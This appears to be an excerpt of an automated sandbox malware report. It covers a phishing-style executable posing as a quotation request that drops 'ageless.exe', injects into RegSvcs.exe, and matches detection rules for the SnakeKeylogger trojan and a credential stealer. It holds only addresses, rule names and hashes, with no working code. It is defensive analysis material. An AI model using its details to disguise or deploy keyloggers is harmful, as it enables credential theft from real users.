Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00C2C468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00C2C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00C2E988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00C269A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00C2CA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00C2CCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00C26FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00C2CFA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00C2E97B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B4CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B9940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B6E27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B6E38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062BB238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B8611
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B3E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B2676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B5640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B3E58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B5650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B0E8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B2680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B0E98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B8AE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B72F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B8ADA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B4320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B4330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B2B37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B7300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B5B07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B5B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B1360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B2B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B1356
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B77B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B8F9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B47E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B5FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B47F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B77C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B5FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B1828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B1821
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B3002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B9468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B9478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B64A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B4CBD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B7C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B7C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B6497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B1CE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B04F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B1CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B34CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B34D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B992F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B0508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B6970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B5177
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B8149
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B39A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B21A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B21B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B5188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B398F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B09C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_062B09D0
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: 8_2_0134B638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A3D279
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A35377
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A37118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A3C146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A3C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A3C46B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A3CA0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A3E988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A369E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A3CFAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A3CCDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A329E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A3F960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_02A3E97F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663A468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663AB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06630B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06639D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663A463
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663E5C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663E5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06638268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06638258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06630040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06630031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663E16A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663E178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663EFBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663EFB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663EB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06630B23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663D462
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663D470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663F401
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663F410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663DD20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06639D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663F86A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663F868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0663D8C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D9940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D3E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D2670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D5640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D3E58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D5650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D6E27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D6E38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D8611
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D0E88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D2680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D0E98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D47E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D5FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D47F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D77C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D5FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D77B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D8F9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D9468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D9478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D1CE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D04F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D1CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D34CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D4CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D34D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D64A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D4CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D7C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D6497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D7C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D0508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066DB238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D8AE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D72F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D8ADA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D1360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D2B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D1352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D4320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D2B37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D4330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D5B07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D7300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D5B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D1828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D0007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D3002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D1818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D5177
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D6970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D8149
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D992F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D09C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D09D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D21A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D39A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D21B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D5188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_066D3996
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06B57398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06B5CD78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_06B54CA0
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: String function: 00F2F9F2 appears 40 times
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: String function: 00F19CB3 appears 31 times
Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe | Code function: String function: 00F30A30 appears 46 times
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: String function: 00D80A30 appears 46 times
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: String function: 00D69CB3 appears 31 times
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe | Code function: String function: 00D7F9F2 appears 40 times
Source: QUOTATION REQUIRED_Enatel s.r.l..exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | author = ditekSHen, description = Detects executables with potential process hoocking
